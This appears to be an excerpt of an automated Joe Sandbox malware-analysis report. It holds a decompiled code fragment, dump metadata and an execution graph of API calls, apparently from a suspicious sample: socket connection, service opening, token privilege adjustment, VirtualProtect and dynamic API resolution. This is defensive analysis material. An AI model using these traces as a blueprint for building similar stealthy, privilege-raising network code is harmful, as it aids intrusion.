                                                                    				_t6 = E00422EEB(E00422F20( *_a4) + 1);
                                                                    				 *((intOrPtr*)(_t15 + 4)) = _t6;
                                                                    				if(_t6 != 0) {
                                                                    					E00423FB0(_t6,  *_t14);
                                                                    				}
                                                                    				 *((intOrPtr*)(_t15 + 8)) = 1;
                                                                    				return _t15;
                                                                    			}





                                                                    0x004224bb
                                                                    0x004224bf
                                                                    0x004224c1
                                                                    0x004224d0
                                                                    0x004224d9
                                                                    0x004224dc
                                                                    0x004224e1
                                                                    0x004224e7
                                                                    0x004224e9
                                                                    0x004224f3

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat_strlen
                                                                    • String ID: c%B
                                                                    • API String ID: 432593777-3320929328
                                                                    • Opcode ID: c72ed0344ed5e7b7e1c5f6f428284e45aef2e38471709534a521797c8c589731
                                                                    • Instruction ID: 33969a01577cb264199cc35a4cbc1147865b94b171568ec021ab07969405ed47
                                                                    • Opcode Fuzzy Hash: c72ed0344ed5e7b7e1c5f6f428284e45aef2e38471709534a521797c8c589731
                                                                    • Instruction Fuzzy Hash: 0EE04F7260C3216EE6246F56FA01546F7E8EF58324B61841FF844C3664EBBAA850865C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11.2%
                                                                    Dynamic/Decrypted Code Coverage:3.3%
                                                                    Signature Coverage:0.9%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:77
                                                                    execution_graph 21674 423c50 21676 423c5c ctype 21674->21676 21675 423d74 ctype 21676->21675 21677 423c76 21676->21677 21678 42275e ___free_lc_time 34 API calls 21676->21678 21679 423c84 21677->21679 21681 42275e ___free_lc_time 34 API calls 21677->21681 21678->21677 21680 423c92 21679->21680 21682 42275e ___free_lc_time 34 API calls 21679->21682 21683 423ca0 21680->21683 21684 42275e ___free_lc_time 34 API calls 21680->21684 21681->21679 21682->21680 21685 423cae 21683->21685 21686 42275e ___free_lc_time 34 API calls 21683->21686 21684->21683 21687 423cbc 21685->21687 21689 42275e ___free_lc_time 34 API calls 21685->21689 21686->21685 21688 423ccd 21687->21688 21690 42275e ___free_lc_time 34 API calls 21687->21690 21691 4241fb __lock 34 API calls 21688->21691 21689->21687 21690->21688 21694 423cd5 21691->21694 21692 423cf5 21704 423d82 21692->21704 21694->21692 21697 42275e ___free_lc_time 34 API calls 21694->21697 21696 4241fb __lock 34 API calls 21701 423d06 21696->21701 21697->21692 21698 423d64 21731 423d8e 21698->21731 21701->21698 21707 42448f 21701->21707 21702 42275e ___free_lc_time 34 API calls 21702->21675 21734 424146 RtlLeaveCriticalSection 21704->21734 21706 423cff 21706->21696 21708 424503 21707->21708 21710 4244a2 21707->21710 21709 42452c 21708->21709 21713 42275e ___free_lc_time 34 API calls 21708->21713 21726 424553 21709->21726 21759 427ea5 21709->21759 21710->21708 21719 42275e ___free_lc_time 34 API calls 21710->21719 21729 4244ce 21710->21729 21711 42275e ___free_lc_time 34 API calls 21712 42455b 21711->21712 21712->21698 21716 42451e 21713->21716 21715 42275e ___free_lc_time 34 API calls 21718 4244fb 21715->21718 21720 42275e ___free_lc_time 34 API calls 21716->21720 21722 42275e ___free_lc_time 34 API calls 21718->21722 21723 4244c6 21719->21723 21720->21709 21721 42275e ___free_lc_time 34 API calls 21721->21726 21722->21708 21735 428094 21723->21735 21724 42275e ___free_lc_time 34 API calls 21725 4244e9 21724->21725 21751 428035 21725->21751 21726->21711 21729->21724 21730 4244f1 21729->21730 21730->21715 21847 424146 RtlLeaveCriticalSection 21731->21847 21733 423d6e 21733->21702 21734->21706 21736 4280a1 21735->21736 21750 42816a 21735->21750 21737 4280bd 21736->21737 21739 42275e ___free_lc_time 34 API calls 21736->21739 21738 4280da 21737->21738 21740 42275e ___free_lc_time 34 API calls 21737->21740 21741 42275e ___free_lc_time 34 API calls 21738->21741 21742 4280f7 21738->21742 21739->21737 21740->21738 21741->21742 21743 428114 21742->21743 21745 42275e ___free_lc_time 34 API calls 21742->21745 21746 42275e ___free_lc_time 34 API calls 21743->21746 21747 428131 21743->21747 21744 42814e 21749 42275e ___free_lc_time 34 API calls 21744->21749 21744->21750 21745->21743 21746->21747 21747->21744 21748 42275e ___free_lc_time 34 API calls 21747->21748 21748->21744 21749->21750 21750->21729 21752 42803e 21751->21752 21758 428091 21751->21758 21753 42275e ___free_lc_time 34 API calls 21752->21753 21754 428058 21752->21754 21753->21754 21755 428075 21754->21755 21756 42275e ___free_lc_time 34 API calls 21754->21756 21757 42275e ___free_lc_time 34 API calls 21755->21757 21755->21758 21756->21755 21757->21758 21758->21730 21760 427eb2 21759->21760 21761 42454b 21759->21761 21762 42275e ___free_lc_time 34 API calls 21760->21762 21761->21721 21763 427eba 21762->21763 21764 42275e ___free_lc_time 34 API calls 21763->21764 21765 427ec2 21764->21765 21766 42275e ___free_lc_time 34 API calls 21765->21766 21767 427eca 21766->21767 21768 42275e ___free_lc_time 34 API calls 21767->21768 21769 427ed2 21768->21769 21770 42275e ___free_lc_time 34 API calls 21769->21770 21771 427eda 21770->21771 21772 42275e ___free_lc_time 34 API calls 21771->21772 21773 427ee2 21772->21773 21774 42275e ___free_lc_time 34 API calls 21773->21774 21775 427ee9 21774->21775 21776 42275e ___free_lc_time 34 API calls 21775->21776 21777 427ef1 21776->21777 21778 42275e ___free_lc_time 34 API calls 21777->21778 21779 427ef9 21778->21779 21780 42275e ___free_lc_time 34 API calls 21779->21780 21847->21733 18011 56184a 18012 561864 18011->18012 18013 561cb5 2 API calls 18012->18013 18014 56186f 18013->18014 18015 561878 NtQuerySystemInformation 18014->18015 18016 561873 18014->18016 18015->18016 18017 561891 18015->18017 18017->18016 18019 561647 18017->18019 18020 56181e 18019->18020 18024 561686 18019->18024 18020->18016 18023 5616f3 lstrcmpiA 18023->18024 18024->18020 18024->18023 18025 561d92 18024->18025 18026 561da1 LoadLibraryA 18025->18026 18029 561de7 18025->18029 18026->18029 18027 5616a1 wsprintfA 18027->18024 18029->18027 18029->18029 18030 561e25 GetProcAddress 18029->18030 18030->18027 18031 561e39 18030->18031 18031->18027 18033 561aaa 18031->18033 18034 561afd 18033->18034 18035 561ab9 18033->18035 18034->18027 18036 561a0e 2 API calls 18035->18036 18036->18034 18648 422c6f 18649 422c7b _fast_error_exit ctype 18648->18649 18650 422c87 GetVersionExA 18649->18650 18651 422ccf GetModuleHandleA 18650->18651 18652 422d0a 18651->18652 18673 424675 HeapCreate 18652->18673 18654 422d3d 18680 423d97 18654->18680 18656 422d4f 18698 42719c 18656->18698 18663 422d8e 18745 426da5 18663->18745 18670 422dd3 GetModuleHandleA 18672 413c60 18670->18672 18674 424695 18673->18674 18675 4246bf 18673->18675 18676 4246c2 18674->18676 18765 4246c6 RtlAllocateHeap 18674->18765 18675->18654 18676->18654 18679 4246b3 HeapDestroy 18679->18675 18767 4240a8 18680->18767 18683 423da0 18771 423bc2 18683->18771 18684 423da8 18687 423e26 FlsAlloc 18684->18687 18688 423dbb GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18684->18688 18689 423e3b 18687->18689 18690 423e7c 18687->18690 18688->18687 18691 423dfe 18688->18691 18692 427472 __lock 34 API calls 18689->18692 18693 423bc2 37 API calls 18690->18693 18691->18687 18694 423e49 18692->18694 18695 423e81 18693->18695 18694->18690 18696 423e51 FlsSetValue 18694->18696 18695->18656 18696->18690 18697 423e62 GetCurrentThreadId 18696->18697 18697->18695 18699 422eeb __getbuf 34 API calls 18698->18699 18701 4271ab 18699->18701 18700 4271f1 GetStartupInfoA 18706 4272f4 18700->18706 18713 42720b 18700->18713 18701->18700 18714 422d68 GetCommandLineA 18701->18714 18702 427323 GetStdHandle 18704 427331 GetFileType 18702->18704 18702->18706 18703 427384 SetHandleCount 18703->18714 18704->18706 18705 422eeb __getbuf 34 API calls 18705->18713 18706->18702 18706->18703 18708 427348 18706->18708 18707 42727c 18707->18706 18709 4272a2 GetFileType 18707->18709 18710 4272ad 18707->18710 18708->18706 18712 427a37 __lock GetProcAddress 18708->18712 18708->18714 18709->18707 18709->18710 18710->18707 18711 427a37 __lock GetProcAddress 18710->18711 18710->18714 18711->18710 18712->18708 18713->18705 18713->18706 18713->18707 18715 42707a 18714->18715 18716 4270b5 18715->18716 18717 427096 GetEnvironmentStringsW 18715->18717 18719 42709e 18716->18719 18720 427145 18716->18720 18718 4270aa GetLastError 18717->18718 18717->18719 18718->18716 18722 4270d4 WideCharToMultiByte 18719->18722 18723 4270cc GetEnvironmentStringsW 18719->18723 18721 427151 GetEnvironmentStrings 18720->18721 18724 422d84 18720->18724 18721->18724 18725 42715d 18721->18725 18727 42713a FreeEnvironmentStringsW 18722->18727 18728 427108 18722->18728 18723->18722 18723->18724 18738 426fd8 18724->18738 18729 422eeb __getbuf 34 API calls 18725->18729 18727->18724 18730 422eeb __getbuf 34 API calls 18728->18730 18737 427176 18729->18737 18731 42710e 18730->18731 18731->18727 18732 427117 WideCharToMultiByte 18731->18732 18734 427131 18732->18734 18735 427128 18732->18735 18733 42718c FreeEnvironmentStringsA 18733->18724 18734->18727 18736 42275e ___free_lc_time 34 API calls 18735->18736 18736->18734 18737->18733 18739 426fea 18738->18739 18740 426fef GetModuleFileNameA 18738->18740 18779 4279f1 18739->18779 18742 427017 18740->18742 18743 422eeb __getbuf 34 API calls 18742->18743 18744 427042 18743->18744 18744->18663 18746 426db2 18745->18746 18748 426db7 _strlen 18745->18748 18747 4279f1 ___initmbctable 63 API calls 18746->18747 18747->18748 18749 422eeb __getbuf 34 API calls 18748->18749 18752 422d9f 18748->18752 18755 426de8 _strcat _strlen 18749->18755 18750 426e31 18751 42275e ___free_lc_time 34 API calls 18750->18751 18751->18752 18757 4253f0 18752->18757 18753 422eeb __getbuf 34 API calls 18753->18755 18754 426e56 18756 42275e ___free_lc_time 34 API calls 18754->18756 18755->18750 18755->18752 18755->18753 18755->18754 18756->18752 18759 4253f9 18757->18759 18758 4228af 38 API calls 18760 422db2 GetStartupInfoA 18758->18760 18759->18758 18759->18760 18761 426d48 18760->18761 18762 426d54 18761->18762 18764 426d59 __wincmdln 18761->18764 18763 4279f1 ___initmbctable 63 API calls 18762->18763 18763->18764 18764->18670 18766 4246ae 18765->18766 18766->18676 18766->18679 18770 4240b1 18767->18770 18768 427a37 __lock GetProcAddress 18768->18770 18769 423d9c 18769->18683 18769->18684 18770->18768 18770->18769 18772 423bcc FlsFree 18771->18772 18773 423bda 18771->18773 18772->18773 18774 42410b RtlDeleteCriticalSection 18773->18774 18775 424123 18773->18775 18776 42275e ___free_lc_time 34 API calls 18774->18776 18777 424135 RtlDeleteCriticalSection 18775->18777 18778 423da5 18775->18778 18776->18773 18777->18775 18778->18656 18780 4279fa 18779->18780 18781 427a01 18779->18781 18783 4278a1 18780->18783 18781->18740 18784 4278ad ctype 18783->18784 18785 4241fb __lock 34 API calls 18784->18785 18786 4278b8 18785->18786 18787 4278de 18786->18787 18788 4278cc GetOEMCP 18786->18788 18789 4278f5 18787->18789 18790 4278e3 GetACP 18787->18790 18788->18789 18791 4279d0 18789->18791 18792 427933 18789->18792 18793 422eeb __getbuf 34 API calls 18789->18793 18790->18789 18807 4279e8 18791->18807 18798 427945 18792->18798 18799 427711 18792->18799 18793->18792 18795 4279df ctype 18795->18781 18797 42275e ___free_lc_time 34 API calls 18797->18791 18798->18791 18798->18797 18800 42772f 18799->18800 18806 42775a ___initmbctable 18799->18806 18802 427746 GetCPInfo 18800->18802 18800->18806 18802->18806 18803 42788d 18804 428381 _fast_error_exit 34 API calls 18803->18804 18805 42789f 18804->18805 18805->18798 18806->18803 18810 427585 GetCPInfo 18806->18810 18946 424146 RtlLeaveCriticalSection 18807->18946 18809 4279ef 18809->18795 18811 427677 18810->18811 18814 4275b5 18810->18814 18816 428381 _fast_error_exit 34 API calls 18811->18816 18820 427ceb 18814->18820 18946->18809 19148 413770 19149 41377b 19148->19149 19150 4137a0 19149->19150 19315 41b960 19149->19315 19221 41db30 19150->19221 19153 4137bf 19154 413be7 19153->19154 19156 4137d4 19153->19156 19157 4137ed 19153->19157 19371 414a10 19154->19371 19159 41b1b0 122 API calls 19156->19159 19321 4018e0 19157->19321 19158 413bf8 19374 404500 19158->19374 19161 4137e7 19159->19161 19226 413350 19161->19226 19164 413809 19236 411f10 19164->19236 19165 413c15 19379 408890 19165->19379 19168 413c28 19386 417e20 19168->19386 19170 413826 19249 414ae0 19170->19249 19173 41385f 19174 41a7a0 2 API calls 19173->19174 19175 413881 19174->19175 19252 41b1b0 19175->19252 19177 4138a7 19222 41db3c 19221->19222 19223 41db8f WSAStartup 19221->19223 19224 41da50 4 API calls 19222->19224 19223->19153 19225 41db87 19224->19225 19225->19223 19227 41338f 19226->19227 19228 402360 39 API calls 19227->19228 19234 41354e 19228->19234 19230 413636 19231 4032c0 39 API calls 19230->19231 19232 413668 19231->19232 19232->19164 19234->19230 19395 4040e0 19234->19395 19431 419500 19234->19431 19470 419210 19234->19470 19237 411f26 19236->19237 19479 41b6c0 19237->19479 19239 411f3d 19240 41b2d0 3 API calls 19239->19240 19241 411f56 19240->19241 19242 411f5d 19241->19242 19243 41c090 3 API calls 19241->19243 19242->19170 19244 411f73 19243->19244 19485 41b3f0 19244->19485 19246 411f8f 19247 41a8e0 3 API calls 19246->19247 19248 411f95 19247->19248 19248->19170 19491 414a20 19249->19491 19253 41b21b CreateThread 19252->19253 19254 41b1bc 19252->19254 19253->19177 19500 4019b0 19253->19500 19528 401190 19253->19528 19567 406b20 19253->19567 19572 414310 19253->19572 19605 414130 19253->19605 19616 419a20 19253->19616 19256 41a600 2 API calls 19254->19256 19316 41b9ab Sleep 19315->19316 19317 41b96c 19315->19317 19316->19150 19317->19317 19318 41b99a 19317->19318 19319 41a600 2 API calls 19318->19319 19320 41b9a3 19319->19320 19320->19316 19322 401953 19321->19322 19323 41ba80 2 API calls 19322->19323 19324 40197e 19323->19324 19325 41b2d0 3 API calls 19324->19325 19326 401997 19325->19326 19327 41a8e0 3 API calls 19326->19327 19328 40199d 19327->19328 19328->19161 19372 41a8e0 3 API calls 19371->19372 19373 414a18 19372->19373 19373->19158 19375 41a8e0 3 API calls 19374->19375 19376 40450c 19375->19376 20690 404020 19376->20690 19378 404522 19378->19165 20705 408290 19379->20705 19382 41a8e0 3 API calls 19383 4088cb 19382->19383 20710 408140 19383->20710 19385 408955 19385->19168 19387 41a8e0 3 API calls 19386->19387 19388 417e52 19387->19388 20723 417b40 19388->20723 19390 417e68 19391 417b40 39 API calls 19390->19391 19392 417e96 19391->19392 19396 404117 19395->19396 19397 41a830 2 API calls 19396->19397 19398 404149 19397->19398 19398->19398 19399 402810 39 API calls 19398->19399 19400 4041b0 19399->19400 19401 402930 39 API calls 19400->19401 19402 4041c9 19401->19402 19403 404207 19402->19403 19404 40423b 19402->19404 19405 404229 19403->19405 19408 4032c0 39 API calls 19403->19408 19406 41ae60 2 API calls 19404->19406 19409 41ae60 2 API calls 19405->19409 19407 40424b 19406->19407 19413 41d920 5 API calls 19407->19413 19410 404221 19408->19410 19411 404231 19409->19411 19412 403380 39 API calls 19410->19412 19411->19234 19412->19405 19430 40427b 19413->19430 19414 4043f9 19415 41d9b0 4 API calls 19414->19415 19416 404429 19415->19416 19416->19411 19418 41a830 2 API calls 19416->19418 19417 41dc80 5 API calls 19417->19430 19419 404438 19418->19419 19420 402a60 39 API calls 19419->19420 19421 404449 19420->19421 19423 403f10 39 API calls 19421->19423 19422 402810 39 API calls 19422->19430 19424 404462 19423->19424 19425 4034a0 39 API calls 19424->19425 19427 404469 19425->19427 19426 402720 39 API calls 19426->19430 19429 41ae60 2 API calls 19427->19429 19428 4031c0 39 API calls 19428->19430 19429->19411 19430->19411 19430->19414 19430->19417 19430->19422 19430->19426 19430->19428 19432 419180 6 API calls 19431->19432 19433 41950c 19432->19433 19434 41dfb0 5 API calls 19433->19434 19435 419523 19434->19435 19436 41952b 19435->19436 19437 41953d 19435->19437 19439 41e040 4 API calls 19436->19439 19438 41e0d0 4 API calls 19437->19438 19440 41954b 19438->19440 19441 419530 19439->19441 19442 419553 19440->19442 19443 419595 19440->19443 19441->19234 19444 41e040 4 API calls 19442->19444 19445 41e150 5 API calls 19443->19445 19446 419558 19444->19446 19447 4195a1 19445->19447 19448 419180 6 API calls 19446->19448 19451 41dbb0 4 API calls 19447->19451 19469 4196a3 19447->19469 19450 419562 19448->19450 19449 41e330 4 API calls 19452 4196e9 19449->19452 19450->19234 19453 4195dc 19451->19453 19454 419702 19452->19454 19455 41973d 19452->19455 19460 41e1e0 5 API calls 19453->19460 19456 419180 6 API calls 19454->19456 19457 41a7a0 2 API calls 19455->19457 19458 419730 19456->19458 19459 41974a 19457->19459 19458->19234 19462 419778 19459->19462 19463 419180 6 API calls 19459->19463 19461 41960b 19460->19461 19464 41e040 4 API calls 19461->19464 19461->19469 19462->19234 19463->19462 19465 419619 19464->19465 19466 41a830 2 API calls 19465->19466 19465->19469 19467 419649 19466->19467 19468 41e270 5 API calls 19467->19468 19467->19469 19468->19469 19469->19449 19471 419282 19470->19471 19472 41921b 19470->19472 19471->19234 19473 41dec0 5 API calls 19472->19473 19474 41922b 19473->19474 19475 41de40 4 API calls 19474->19475 19476 419252 19475->19476 19476->19471 19477 41a8e0 3 API calls 19476->19477 19478 419261 19477->19478 19478->19234 19480 41b74b GetModuleFileNameA 19479->19480 19481 41b6cc 19479->19481 19480->19239 19483 41a600 2 API calls 19481->19483 19484 41b743 19483->19484 19484->19480 19486 41b44b ReadFile 19485->19486 19487 41b3fc 19485->19487 19486->19246 19489 41a600 2 API calls 19487->19489 19490 41b443 19489->19490 19490->19486 19492 421b15 39 API calls 19491->19492 19493 414a51 19492->19493 19494 41b1b0 122 API calls 19493->19494 19496 414aa0 19494->19496 19495 414ab1 19498 41a8e0 3 API calls 19495->19498 19496->19495 19497 41a830 2 API calls 19496->19497 19497->19495 19499 414ab7 19498->19499 19499->19173 20693 404034 20690->20693 20691 404038 20691->19378 20693->20691 20694 403a50 20693->20694 20695 403a77 20694->20695 20703 403ac3 20694->20703 20696 402810 39 API calls 20695->20696 20697 403a9a 20696->20697 20698 4029a0 39 API calls 20697->20698 20699 403aac 20698->20699 20704 42246e RaiseException 20699->20704 20701 403500 39 API calls 20702 403cdd 20701->20702 20702->20693 20703->20701 20704->20703 20706 41a830 2 API calls 20705->20706 20708 4082a1 20706->20708 20707 41ae60 2 API calls 20709 40838d 20707->20709 20708->20707 20709->19382 20713 408154 20710->20713 20711 408158 20711->19385 20713->20711 20713->20713 20714 407c80 20713->20714 20715 407cab 20714->20715 20721 407cf7 20714->20721 20716 402810 39 API calls 20715->20716 20717 407cce 20716->20717 20718 4029a0 39 API calls 20717->20718 20719 407ce0 20718->20719 20722 42246e RaiseException 20719->20722 20721->20713 20722->20721 20726 417b54 20723->20726 20724 417b58 20724->19390 20726->20724 20727 4177c0 20726->20727 20728 4177e7 20727->20728 20734 417833 20727->20734 20729 402810 39 API calls 20728->20729 20730 41780a 20729->20730 20734->20726 20736 420970 20737 420984 20736->20737 20738 42097d 20736->20738 20757 41f4c0 20737->20757 20758 41f560 20757->20758 20759 41ac50 2 API calls 20758->20759 20760 41f623 20759->20760 20761 41acd0 3 API calls 20760->20761 20762 41f629 20761->20762 20763 41c690 5 API calls 20762->20763 20764 41f66b 20763->20764 20765 41f674 20764->20765 20766 41b8e0 2 API calls 20764->20766 20767 41c720 5 API calls 20765->20767 20766->20765 20768 41f697 20767->20768 20769 41b8e0 2 API calls 20768->20769 20770 41f6a0 20768->20770 20769->20770 20942 41edb0 20770->20942 20772 41f71f 20972 41eec0 20772->20972 20774 41f72f 20775 41ac50 2 API calls 20774->20775 20776 41f73a 20775->20776 20777 41ad50 3 API calls 20776->20777 20778 41f740 20777->20778 20779 41c870 5 API calls 20778->20779 20780 41f74a 20779->20780 20781 41f760 20780->20781 20782 41f890 20781->20782 20782->20782 20783 41ac50 2 API calls 20782->20783 20784 41f980 20783->20784 20943 41edd0 20942->20943 20943->20943 20988 41d0a0 20943->20988 20945 41edee 20946 41edf5 20945->20946 20947 41ee0a 20945->20947 20948 41b8e0 2 API calls 20946->20948 20994 41d130 20947->20994 20950 41edfa 20948->20950 20950->20772 20951 41ee17 20952 41ee38 20951->20952 20953 41ee1d 20951->20953 21004 41d260 20952->21004 20955 41b8e0 2 API calls 20953->20955 20956 41ee22 20955->20956 21000 41d1c0 20956->21000 20959 41ee71 20963 41d1c0 4 API calls 20959->20963 20960 41ee50 20962 41b8e0 2 API calls 20960->20962 20964 41ee55 20962->20964 20965 41ee77 20963->20965 20967 41d1c0 4 API calls 20964->20967 20966 41d1c0 4 API calls 20965->20966 20968 41ee7d 20966->20968 20969 41ee61 20967->20969 20968->20772 20970 41d1c0 4 API calls 20969->20970 20971 41ee67 20970->20971 20971->20772 20973 41eee1 20972->20973 20973->20973 20974 41a7a0 2 API calls 20973->20974 20975 41ef07 20974->20975 20976 41ef21 20975->20976 20977 41ef0d 20975->20977 20978 41a830 2 API calls 20976->20978 20979 41b8e0 2 API calls 20977->20979 20980 41ef2c 20978->20980 20981 41ef12 20979->20981 20982 41ef31 20980->20982 20983 41ef4c 20980->20983 20981->20774 20984 41a8e0 3 API calls 20982->20984 20985 41a8e0 3 API calls 20983->20985 20986 41ef36 20984->20986 20987 41ef51 20985->20987 20986->20774 20987->20774 20989 41d113 OpenSCManagerA 20988->20989 20990 41d0ac 20988->20990 20989->20945 20992 41c580 4 API calls 20990->20992 20993 41d10b 20992->20993 20993->20989 20995 41d19b OpenServiceA 20994->20995 20996 41d13c 20994->20996 20995->20951 20998 41c580 4 API calls 20996->20998 20999 41d193 20998->20999 20999->20995 21001 41d243 21000->21001 21002 41d1cc 21000->21002 21001->20772 21003 41c580 4 API calls 21002->21003 21003->21001 21005 41d270 21004->21005 21007 41d2f3 21004->21007 21006 41c580 4 API calls 21005->21006 21006->21007 21007->20959 21007->20960 17320 419500 17359 419180 17320->17359 17322 41950c 17370 41dfb0 17322->17370 17324 419523 17325 41952b 17324->17325 17326 41953d 17324->17326 17328 41e040 4 API calls 17325->17328 17375 41e0d0 17326->17375 17330 419530 17328->17330 17331 419553 17333 41e040 4 API calls 17331->17333 17332 419595 17379 41e150 17332->17379 17335 419558 17333->17335 17337 419180 6 API calls 17335->17337 17336 4195a1 17358 4196a3 17336->17358 17384 41dbb0 17336->17384 17339 419562 17337->17339 17342 4195dc 17388 41e1e0 17342->17388 17343 419702 17345 419180 6 API calls 17343->17345 17344 41973d 17410 41a7a0 17344->17410 17347 419730 17345->17347 17350 41960b 17350->17358 17393 41e040 17350->17393 17351 419778 17352 419180 6 API calls 17352->17351 17354 419619 17354->17358 17397 41a830 17354->17397 17356 419649 17356->17358 17401 41e270 17356->17401 17406 41e330 17358->17406 17360 41918c 17359->17360 17361 419191 17359->17361 17360->17322 17362 4191ce 17361->17362 17414 41dec0 17361->17414 17363 4191e2 17362->17363 17427 41a8e0 17362->17427 17363->17322 17366 41919d 17419 41df30 17366->17419 17371 41dfbc 17370->17371 17372 41e00f WSASocketA 17370->17372 17373 41da50 4 API calls 17371->17373 17372->17324 17374 41e007 17373->17374 17374->17372 17376 41954b 17375->17376 17377 41e0dc 17375->17377 17376->17331 17376->17332 17378 41da50 4 API calls 17377->17378 17378->17376 17380 41e1c2 WSAEventSelect 17379->17380 17381 41e15c 17379->17381 17380->17336 17382 41da50 4 API calls 17381->17382 17383 41e1ba 17382->17383 17383->17380 17385 41dbf3 17384->17385 17386 41dbbc 17384->17386 17385->17342 17387 41da50 4 API calls 17386->17387 17387->17385 17389 41e1ec 17388->17389 17390 41e23f WSAConnect 17388->17390 17391 41da50 4 API calls 17389->17391 17390->17350 17392 41e237 17391->17392 17392->17390 17394 41e04c 17393->17394 17396 41e0b3 17393->17396 17395 41da50 4 API calls 17394->17395 17395->17396 17396->17354 17398 41a840 17397->17398 17399 41a8b8 17397->17399 17400 41a600 2 API calls 17398->17400 17399->17356 17400->17399 17402 41e280 17401->17402 17403 41e30b WSAEnumNetworkEvents 17401->17403 17404 41da50 4 API calls 17402->17404 17403->17358 17405 41e303 17404->17405 17405->17403 17407 41e33c 17406->17407 17408 4196e9 17406->17408 17409 41da50 4 API calls 17407->17409 17408->17343 17408->17344 17409->17408 17411 41974a 17410->17411 17412 41a7ac 17410->17412 17411->17351 17411->17352 17413 41a600 2 API calls 17412->17413 17413->17411 17415 41df13 shutdown 17414->17415 17416 41decc 17414->17416 17415->17366 17416->17416 17433 41da50 17416->17433 17420 41df3c 17419->17420 17421 4191c5 17419->17421 17422 41da50 4 API calls 17420->17422 17423 41de40 17421->17423 17422->17421 17424 41de4c 17423->17424 17425 41dea3 17423->17425 17424->17424 17426 41da50 4 API calls 17424->17426 17425->17362 17426->17425 17428 41a94b FindCloseChangeNotification 17427->17428 17429 41a8ec 17427->17429 17428->17363 17431 41a600 2 API calls 17429->17431 17432 41a943 17431->17432 17432->17428 17437 41da5e 17433->17437 17434 41dafd GetProcAddress 17435 41db1f 17434->17435 17436 41db0f 17434->17436 17435->17415 17436->17435 17439 41a720 2 API calls 17436->17439 17437->17434 17437->17437 17438 41dabb LoadLibraryA 17437->17438 17438->17434 17440 41dacf 17438->17440 17439->17435 17440->17434 17441 41daf1 17440->17441 17444 41a720 17441->17444 17445 41a783 17444->17445 17446 41a72c 17444->17446 17445->17434 17448 41a600 17446->17448 17450 41a636 17448->17450 17449 41a6f6 GetProcAddress 17451 41a708 17449->17451 17450->17449 17452 41a69c LoadLibraryA 17450->17452 17451->17445 17453 41a6d0 17452->17453 17453->17449 17720 404810 17737 41afe0 17720->17737 17723 41afe0 2 API calls 17724 404823 17723->17724 17741 41c9f0 17724->17741 17726 40491a 17729 4048c9 17730 4048da 17729->17730 17731 4048cd 17729->17731 17751 41cb80 17730->17751 17732 41a8e0 3 API calls 17731->17732 17734 4048d6 17732->17734 17735 404911 17736 41a8e0 3 API calls 17735->17736 17736->17726 17738 404818 17737->17738 17739 41afec 17737->17739 17738->17723 17740 41a600 2 API calls 17739->17740 17740->17738 17742 41ca11 17741->17742 17742->17742 17743 404829 17742->17743 17757 41c580 17742->17757 17743->17726 17745 41cac0 17743->17745 17746 41cad0 17745->17746 17747 41cb5b LookupPrivilegeValueA 17745->17747 17749 41c580 4 API calls 17746->17749 17747->17729 17750 41cb53 17749->17750 17750->17747 17752 41cb90 17751->17752 17753 41cc1b AdjustTokenPrivileges 17751->17753 17755 41c580 4 API calls 17752->17755 17753->17735 17756 41cc13 17755->17756 17756->17753 17761 41c5b6 17757->17761 17758 41c65f GetProcAddress 17759 41c681 17758->17759 17760 41c671 17758->17760 17759->17743 17760->17759 17763 41a720 2 API calls 17760->17763 17761->17758 17761->17761 17762 41c61e LoadLibraryA 17761->17762 17762->17758 17764 41c642 17762->17764 17763->17759 17764->17758 17765 41a720 2 API calls 17764->17765 17766 41c659 17765->17766 17766->17758 19136 41d130 19137 41d19b OpenServiceA 19136->19137 19138 41d13c 19136->19138 19140 41c580 4 API calls 19138->19140 19141 41d193 19140->19141 19141->19137 17454 5619d7 17455 5619de 17454->17455 17456 5619f6 17455->17456 17457 5619ec 17455->17457 17459 5619f4 17455->17459 17469 5619a6 17456->17469 17457->17459 17461 5618ab 17457->17461 17462 5618e0 17461->17462 17472 561c31 17462->17472 17465 56199a 17465->17459 17466 56197b GetProcAddress 17466->17465 17467 56198e 17466->17467 17478 561134 17467->17478 17511 561cb5 17469->17511 17473 561970 LoadLibraryA 17472->17473 17474 561c40 17472->17474 17473->17465 17473->17466 17487 561a0e 17474->17487 17477 561ca0 17477->17473 17493 561d1b 17478->17493 17480 561154 17499 561b0c 17480->17499 17484 561163 17485 561d1b 3 API calls 17484->17485 17486 56118e 17485->17486 17486->17465 17488 561a80 GetProcAddress 17487->17488 17489 561a1d LoadLibraryA 17487->17489 17490 561a96 17488->17490 17489->17488 17492 561a71 17489->17492 17490->17477 17492->17488 17494 561d80 VirtualProtect 17493->17494 17495 561d2a 17493->17495 17494->17480 17497 561a0e 2 API calls 17495->17497 17498 561d7a 17497->17498 17498->17494 17500 56115d 17499->17500 17501 561b1b 17499->17501 17505 561b75 17500->17505 17503 561a0e 2 API calls 17501->17503 17504 561b6b 17503->17504 17504->17500 17506 561bc6 17505->17506 17507 561b84 17505->17507 17506->17484 17509 561a0e 2 API calls 17507->17509 17510 561bc0 17509->17510 17510->17506 17512 561cc4 17511->17512 17513 5619b1 17511->17513 17515 561a0e 2 API calls 17512->17515 17513->17459 17516 561d0c 17515->17516 17516->17513 17517 41b6c0 